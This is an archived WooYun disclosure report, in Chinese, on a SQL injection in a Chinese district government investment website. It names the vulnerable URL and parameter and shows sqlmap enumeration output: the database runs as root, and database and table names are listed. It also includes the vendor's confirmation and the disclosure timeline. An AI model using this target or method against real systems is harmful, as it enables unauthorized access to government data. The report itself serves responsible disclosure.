乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-04: 细节已通知厂商并且等待厂商处理中 2014-07-04: 厂商已经确认,细节仅向厂商公开 2014-07-14: 细节向核心白帽子及相关领域专家公开 2014-07-24: 细节向普通白帽子公开 2014-08-03: 细节向实习白帽子公开 2014-08-18: 细节向公众公开
投资花都网http://www.investhuadu.gov.cn/topic.php?channelID=1&topicID=1
丢入sqlmap
web application technology: PHP 5.2.2, Apache 2.2.4back-end DBMS: MySQL 5.0banner: '5.0.41-community-log'current user: 'root@%'current database: 'db_investhuadu'
数据库
available databases [5]:[*] db_investhuadu[*] db_investhuadu_temp[*] information_schema[*] mysql[*] test
Database: db_investhuadu[55 tables]+----------------------------------+| cms_admintopic || cms_bmlm || cms_business || cms_case || cms_channel || cms_download || cms_ebook || cms_ebook_copy || cms_form || cms_functions || cms_group || cms_guanfangtj || cms_guanfangtj_review || cms_guestbook || cms_homelogo || cms_info || cms_info_backup_zuixingonggao_46 || cms_jishuzx || cms_jishuzx_review || cms_mem_bmfgs || cms_mem_group || cms_mem_user || cms_message || cms_news || cms_news_copy || cms_news_review || cms_orderfield || cms_orderform || cms_orderform2 || cms_orderlist || cms_ordertext || cms_pic_list || cms_pic_type || cms_product || cms_qiyejs || cms_qiyejs_review || cms_question || cms_session || cms_setting || cms_subject || cms_topic || cms_tupian || cms_tupian_review || cms_tupian_tp || cms_type || cms_user || cms_userlog || cms_video_list || cms_vote || cms_website || cms_xiangmuzx || cms_xiangmuzx_review || cms_zijinzx || cms_zijinzx_review || cms_ztdown |+----------------------------------+
http://www.investhuadu.gov.cn/topic.php?channelID=1&topicID=1
危害等级:中
漏洞Rank:10
确认时间:2014-07-04 17:46
非常感谢您的报告。报告中的问题已确认并复现,典型的SQL注射漏洞,能被进一步利用,危害性大.影响的数据:中攻击成本:低造成影响:中综合评级为:中,rank:10正在联系相关网站管理单位处置。
暂无